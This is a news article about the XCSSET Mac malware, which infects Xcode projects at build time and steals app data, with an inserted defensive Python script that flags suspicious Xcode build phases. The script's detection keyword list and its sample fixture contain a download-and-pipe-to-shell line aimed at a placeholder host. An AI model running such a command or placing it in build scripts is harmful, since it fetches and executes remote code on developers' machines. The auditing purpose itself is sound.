This devious Mac malware has developers in its crosshairs
But experts say they may have cracked the latest Mac malware
Malware analysts have shared new details about the infamous XCSSET malware that targets Mac devices around the world.
XCSSET first came into the spotlight in August 2020, when it was spotted inside Apple projects developed using the free Xcode integrated development environment (IDE). A variant of the malware was then discovered, designed specifically to target M1-powered Macs.
Now, cybersecurity researchers at Trend Micro have once again found an updated version of the malware that’s taken on new features and can target popular apps including Telegram and Google Chrome.
“The changes we’ve encountered in XCSSET do not reflect a fundamental change in its behavior but do constitute refinements in its tactics,” note the researchers in a blog post analyzing XCSSET’s information stealing capabilities.
Targeting developers
The XCSSET malware is particularly troublesome since its infection mechanism can be used to launch supply-chain-like attacks.
The malware works by injecting malicious code into local Xcode projects, which executes every time the project is built. This poses an issue not just for the developers, but also for any downstream users that run the software infected with the malware.
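As an added example (not code from the article, from Trend Micro or from Apple), here is a small Python audit that lists the Run Script build phases in an Xcode project.pbxproj and flags the ones a developer should read before building a project of uncertain origin. It assumes the injected build-time code lives in a PBXShellScriptBuildPhase, which the article does not state, and runs against a constructed sample project rather than a real one.

```python
import re

# Added example. Assumption: the code that "executes every time the project is
# built" is a Run Script build phase (PBXShellScriptBuildPhase) in project.pbxproj.
_PHASE_RE = re.compile(
    r'(?P<id>[0-9A-F]{24}) /\* (?P<name>[^*]*?) \*/ = \{\s*'
    r'isa = PBXShellScriptBuildPhase;(?P<body>.*?)\};', re.S)
_SCRIPT_RE = re.compile(r'shellScript = "(?P<s>(?:[^"\\]|\\.)*)";', re.S)
# Generic things a reviewer wants to eyeball in a build script; not XCSSET IoCs.
SUSPECT = ("curl ", "wget ", "base64", "osascript", "| sh", "| bash", "eval ")

def unescape_pbx(s):
    # pbxproj strings escape newlines, tabs, quotes and backslashes C-style
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m[1], m[1]), s)

def find_script_phases(pbxproj):
    """Return every Run Script build phase as {id, name, script}."""
    phases = []
    for m in _PHASE_RE.finditer(pbxproj):
        script = _SCRIPT_RE.search(m.group("body"))
        phases.append({
            "id": m.group("id"),
            "name": m.group("name").strip(),
            "script": unescape_pbx(script.group("s")) if script else "",
        })
    return phases

def suspicious_phases(pbxproj):
    """Phases whose script contains one of the SUSPECT markers."""
    return [p for p in find_script_phases(pbxproj)
            if any(tok in p["script"] for tok in SUSPECT)]

# Constructed sample: a normal lint phase plus one that pipes a download into
# a shell (example.invalid is a reserved, non-resolving domain).
SAMPLE_PBXPROJ = """
\t\tA1A1A1A1A1A1A1A1A1A1A1A1 /* Lint */ = {
\t\t\tisa = PBXShellScriptBuildPhase;
\t\t\tshellPath = /bin/sh;
\t\t\tshellScript = "if which swiftlint >/dev/null; then swiftlint; fi\\n";
\t\t};
\t\tB2B2B2B2B2B2B2B2B2B2B2B2 /* Run Script */ = {
\t\t\tisa = PBXShellScriptBuildPhase;
\t\t\tshellPath = /bin/sh;
\t\t\tshellScript = "curl -s http://example.invalid/stage | sh\\n";
\t\t};
"""

if __name__ == "__main__":
    for p in suspicious_phases(SAMPLE_PBXPROJ):
        print(f"review phase {p['id']} ({p['name']}):\n{p['script']}")
```

Point it at a real project with `find_script_phases(open("project.pbxproj").read())`; the heuristic list only narrows what to read, it does not replace reading the scripts.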
Trend Micro has been monitoring the malware since last year and recently learnt how it steals information. Using the examples of Telegram and Google Chrome, the researchers explained how the malware exfiltrates information to its command and control (C2) servers.
“Not all executable files are sandboxed on macOS, which means a simple script can steal all the data stored in the sandbox directory,” say the researchers, asking application developers not to store sensitive data, such as login information, in the sandbox directory.
Besides Telegram and Chrome, Trend Micro also found scripts that targeted other popular apps, including Opera, Skype, Evernote, WeChat, and more.
With almost two decades of writing and reporting on Linux, Mayank Sharma would like everyone to think he’s TechRadar Pro’s expert on the topic. Of course, he’s just as interested in other computing topics, particularly cybersecurity, cloud, containers, and coding.